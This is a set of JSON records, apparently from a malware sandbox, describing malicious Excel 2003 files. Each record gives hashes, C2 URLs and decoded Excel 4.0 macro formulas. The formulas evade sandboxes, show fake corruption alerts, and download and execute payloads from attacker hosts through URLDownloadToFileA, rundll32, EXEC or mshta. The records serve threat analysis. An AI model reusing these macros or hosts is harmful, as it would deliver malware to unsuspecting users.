{"version":"0.2","sample":{"sample":"","kind":"file","target":"660cb6ceed07af4b25f6df5e6a0614dba3fd43e5089fe8101c20ac5764f365f1"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"660cb6ceed07af4b25f6df5e6a0614dba3fd43e5089fe8101c20ac5764f365f1","filesize":103941,"md5":"30b53f9cc1b9d9c4394bbeb6dc598331","sha1":"dea18bd912002c34685b343c86da86e327228ffa","sha256":"660cb6ceed07af4b25f6df5e6a0614dba3fd43e5089fe8101c20ac5764f365f1","sha512":"51a58ac5228c539977dacd4935eb85abee7406d3440c479b28c573c18d495bec8c74053b5a37d8fe59b478cfae76c5fd2e2104e9e65661e179ad729556506481","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"660cb6ceed07af4b25f6df5e6a0614dba3fd43e5089fe8101c20ac5764f365f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6628d8ca4e5fb641c8816b3b2cc68674d2449f2a7b0e3381ff63dee56b4428ee"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"6628d8ca4e5fb641c8816b3b2cc68674d2449f2a7b0e3381ff63dee56b4428ee","filesize":168448,"md5":"3e6bbc28c01ccde6553c47a009a1a84f","sha1":"62ad6b60ac0c6df563fad2ff5c82722bedef3e71","sha256":"6628d8ca4e5fb641c8816b3b2cc68674d2449f2a7b0e3381ff63dee56b4428ee","sha512":"e71498ca25a37767b657a211d4321d74c42784672cfb2b008b02756ec1bd5136058512ce4cc04e2de9ac16be28cbf2f8c675ec114e4d05cf176fa569fc8c90c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6628d8ca4e5fb641c8816b3b2cc68674d2449f2a7b0e3381ff63dee56b4428ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"d78ZVlKAwC\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"663315043405285401747851275f7589edb8d41cfbe5ce0a958033d670452a6d"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"663315043405285401747851275f7589edb8d41cfbe5ce0a958033d670452a6d","filesize":112640,"md5":"4f5fffd1701740d1e3ee4d8294fe2017","sha1":"84cb4de38d2afdc0026490f2602cf65f4a0bd6e9","sha256":"663315043405285401747851275f7589edb8d41cfbe5ce0a958033d670452a6d","sha512":"63c35bda0c87bf4747e872913b7cf7c986b61954cf28dba487071a4098798fca607e018a63ead284875edfefc522c8c0a79ce2ff336f811083ba1df97bc6d3dd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"663315043405285401747851275f7589edb8d41cfbe5ce0a958033d670452a6d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"663f7b14a710165e75006397b8af675c4f7e0e10e8c5e959d011788e801045a5"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"663f7b14a710165e75006397b8af675c4f7e0e10e8c5e959d011788e801045a5","filesize":209920,"md5":"a76e5cccb0d5e9425d092b1397a5d3cc","sha1":"95ef620831ec068387c50b7b2c8e8a523ea8e979","sha256":"663f7b14a710165e75006397b8af675c4f7e0e10e8c5e959d011788e801045a5","sha512":"97c6d9bb9d3c9618a9a22c1d075260e3a5ec19a9613b77b9336a8fdb1ab587884af27141a5de126b4d4cb02987dc9c897f147b8fc38a76d846813e98e716a333","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"663f7b14a710165e75006397b8af675c4f7e0e10e8c5e959d011788e801045a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iwePEjai9w\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"664327e1756d4d490d95765beefd7e45ff16b92fe93a68cb4590faa63f21e070"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"664327e1756d4d490d95765beefd7e45ff16b92fe93a68cb4590faa63f21e070","filesize":209920,"md5":"40ec5cdcbe748fe1abe77e968bc9d735","sha1":"402220d4a8bcd644efcf275ef9deb66d83546cd4","sha256":"664327e1756d4d490d95765beefd7e45ff16b92fe93a68cb4590faa63f21e070","sha512":"70e6bd841dc96d43e5f0baa4cc633114fbbc24afcc8bf2f0a2542a0fa15edacb3f27b897c881d8c4b09e0fe1b0ab0402555a5de60b1630cf8a2d67a9596eaf36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"664327e1756d4d490d95765beefd7e45ff16b92fe93a68cb4590faa63f21e070.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RzKLzUlmpQ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"664ff9e491165d7995cee5f8d18b753fb1b13b87444b66c1d10bdc03dba68bf9"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"664ff9e491165d7995cee5f8d18b753fb1b13b87444b66c1d10bdc03dba68bf9","filesize":132608,"md5":"2068987ed0685f5e0d32ccc43f0cbc21","sha1":"f2ba0d178380b5861198854423b5de86e1ddd5e4","sha256":"664ff9e491165d7995cee5f8d18b753fb1b13b87444b66c1d10bdc03dba68bf9","sha512":"dda611b63d85cc7d6e560b669f94e2c8cdbc6f80a6b3da37af7aa22b050d7816ac5c766fb14c683827196160f9a5c8314583d52b3a6c16c3201815d56b2e8a36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"664ff9e491165d7995cee5f8d18b753fb1b13b87444b66c1d10bdc03dba68bf9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Mse3TDJvBy\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66681f03e2a4c435a8902bec97882b3d715b335c4dcdbffeca07d493addfda7f"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"66681f03e2a4c435a8902bec97882b3d715b335c4dcdbffeca07d493addfda7f","filesize":193024,"md5":"512e61b890dae66f1b3d3fbce4efbf3b","sha1":"74c4653cc018c275af731b45bd5cd50a60ba0829","sha256":"66681f03e2a4c435a8902bec97882b3d715b335c4dcdbffeca07d493addfda7f","sha512":"e9730a4ca21994495b5f949eee35797f34e71eb7712022290880b7aa2064ec0a11ab6296dd0632fab59e33bb2b7092da9f2357b03db97597bf9fb46f1281b52c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66681f03e2a4c435a8902bec97882b3d715b335c4dcdbffeca07d493addfda7f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"EXEC(\"mshta https://loubanas.xyz/DcsRGXPg\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6674ec88df4d747a533cb93768ce114e19a73ec94a1d22761df5d43ed92782ca"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"6674ec88df4d747a533cb93768ce114e19a73ec94a1d22761df5d43ed92782ca","filesize":206336,"md5":"d675c18dc3a900daed4dab511c95e785","sha1":"6ced2d661dc3c9537d5bb9ff1dee23ae33cb956d","sha256":"6674ec88df4d747a533cb93768ce114e19a73ec94a1d22761df5d43ed92782ca","sha512":"3cbea9d3f7d910567962bbc2c1c2ca13b1d54d6abcd5cb7e62d726fd1b3f2bfa6320dc6041e407106fadf7f5a2ad1636b62efd1713df30e3fb6581054ebcbd9f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6674ec88df4d747a533cb93768ce114e19a73ec94a1d22761df5d43ed92782ca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tCQJEln5Iq\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6675a30ce4104bb536376605d944cc7a66d8460b9aca8ae8ff928b8d2f0bdd96"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"6675a30ce4104bb536376605d944cc7a66d8460b9aca8ae8ff928b8d2f0bdd96","filesize":167936,"md5":"c2b743df62b306231a65cd29f6e0a10b","sha1":"c51be0594a09d362e4972686f170338eb920ec82","sha256":"6675a30ce4104bb536376605d944cc7a66d8460b9aca8ae8ff928b8d2f0bdd96","sha512":"a03535597883d4648f06015d26644000032e409cbd918aedfb0aafcbe0000935fe2548d41f7532f4506114c2e2cb719e0e4a13fa1bac2508f5de05613ee899a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6675a30ce4104bb536376605d944cc7a66d8460b9aca8ae8ff928b8d2f0bdd96.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p3o4FpSCLT\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66777ef0d46825e453f3a9d40686ecd10a64480e9b46cabf0791f1b7e66aaa7c"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"66777ef0d46825e453f3a9d40686ecd10a64480e9b46cabf0791f1b7e66aaa7c","filesize":185344,"md5":"856e65994af7857ae7f235232e7c3f7e","sha1":"2f49865a2bd7deaf15ac6227a247675a889af223","sha256":"66777ef0d46825e453f3a9d40686ecd10a64480e9b46cabf0791f1b7e66aaa7c","sha512":"4c5a1b624ee2b365e6ed29695e1dc765ffef03dcd7d5a4c865457eece2cbe50b684b1f490ecb7461116f647bb4dad2450946fff24d975417c93412ce6db20d2c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66777ef0d46825e453f3a9d40686ecd10a64480e9b46cabf0791f1b7e66aaa7c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"668b492e7a259956bcefbfaebea25df53694f56ec5410c8fceb786e0f3e159f4"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"668b492e7a259956bcefbfaebea25df53694f56ec5410c8fceb786e0f3e159f4","filesize":3593216,"md5":"05cac47a91e2a418603e65a5033ce7ec","sha1":"d761b8f05caa780f903dad3dccb169b4c175032a","sha256":"668b492e7a259956bcefbfaebea25df53694f56ec5410c8fceb786e0f3e159f4","sha512":"d51665680d8597cd3c3b984730239a6dd90458f66d2a3246bc691b28c2637bd4e9ea8064460213246bb6d27274ebcbf90ceb3d670c0b3ac284bed7abcb6667fe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"668b492e7a259956bcefbfaebea25df53694f56ec5410c8fceb786e0f3e159f4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nHYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nLEFT(SUBSTITUTE(SUBSTITUTE(SUBSTITUTE(R$65531C$41,\"|\",\"\n\"),\"[{\",),\"}]\",),1)\nSUBSTITUTE(SUBSTITUTE(SUBSTITUTE(R$65531C$41,\"|\",\"\n\"),\"[{\",),\"}]\",)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66a469f0dcbb41d8c5a826a5414a1a4385e9bebe868c5bbf0be9e907e952f5ac"},"analysis":{"reported":"2020-04-09T16:16:44Z","score":10},"files":[{"filename":"66a469f0dcbb41d8c5a826a5414a1a4385e9bebe868c5bbf0be9e907e952f5ac","filesize":185344,"md5":"b5762d3f04500d0631b68194eb0cedfc","sha1":"b083e85fcd312e13496704a55548b070248a96c5","sha256":"66a469f0dcbb41d8c5a826a5414a1a4385e9bebe868c5bbf0be9e907e952f5ac","sha512":"4e757169c9a93e1040367dfe11409f091d9e9747ebee77bbbdeedf60d329f1e5b0281884c075bf9e9213c16ac0970ea6833e449830fe60b0f3b0d76149934e16","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66a469f0dcbb41d8c5a826a5414a1a4385e9bebe868c5bbf0be9e907e952f5ac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66a56c8f8b60c30d7ee77cf799e00672298bfc690de78ef5168ae3fa9d2528e8"},"analysis":{"reported":"2020-04-09T16:16:44Z","score":10},"files":[{"filename":"66a56c8f8b60c30d7ee77cf799e00672298bfc690de78ef5168ae3fa9d2528e8","filesize":206336,"md5":"dab1e81c865a0292f21226848b90877e","sha1":"6777616c3172835a3800979e5408ab1c752f110c","sha256":"66a56c8f8b60c30d7ee77cf799e00672298bfc690de78ef5168ae3fa9d2528e8","sha512":"12f57049ef8c43a043ee6212a33affd506551ddf875edcfa05d5f6a4134886f59c74fa95e670b91eb5918f8e7234dfc70bea1fdc03574f8ae63b6e96c2b5bcda","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66a56c8f8b60c30d7ee77cf799e00672298bfc690de78ef5168ae3fa9d2528e8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VWeZwwsTPk\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66afae0eb75b4bc73b4d9ea902f4a9f213ae37ca772bb330ef77be1f36ba5fdc"},"analysis":{"reported":"2020-04-09T16:16:45Z","score":10},"files":[{"filename":"66afae0eb75b4bc73b4d9ea902f4a9f213ae37ca772bb330ef77be1f36ba5fdc","filesize":182784,"md5":"f0c3ac9fdcf15ac6797197875e92ee02","sha1":"c253a86fe896884f0a8d407661a918d79f93e330","sha256":"66afae0eb75b4bc73b4d9ea902f4a9f213ae37ca772bb330ef77be1f36ba5fdc","sha512":"c96fe088741d9d6d3c5909ff963ebccc676d54463c219d02e4766e4a5e9684d6331d8dc6e2e9af42a6c80244382e75f25d9f3b7297f7d9b1ead0113d3bab61b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66afae0eb75b4bc73b4d9ea902f4a9f213ae37ca772bb330ef77be1f36ba5fdc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"66b181c18e837aacab80482aad06ccbe64b19a0bd7a091f45f18e855a637fb72"},"analysis":{"reported":"2020-04-09T16:16:45Z","score":10},"files":[{"filename":"66b181c18e837aacab80482aad06ccbe64b19a0bd7a091f45f18e855a637fb72","filesize":185344,"md5":"063b72309c73f3535348061e711b904a","sha1":"a1d18551d60c62537ffad02d0b993c1b9316a6c1","sha256":"66b181c18e837aacab80482aad06ccbe64b19a0bd7a091f45f18e855a637fb72","sha512":"9594e0f3c6fa8734e7116587d57c8128a422ba4d5c84a63b6adb3745e38db60e59dfebff59cc78c9dfda788ea38db861dc1bdef534393848ae5a87212c83ae21","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"66b181c18e837aacab80482aad06ccbe64b19a0bd7a091f45f18e855a637fb72.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
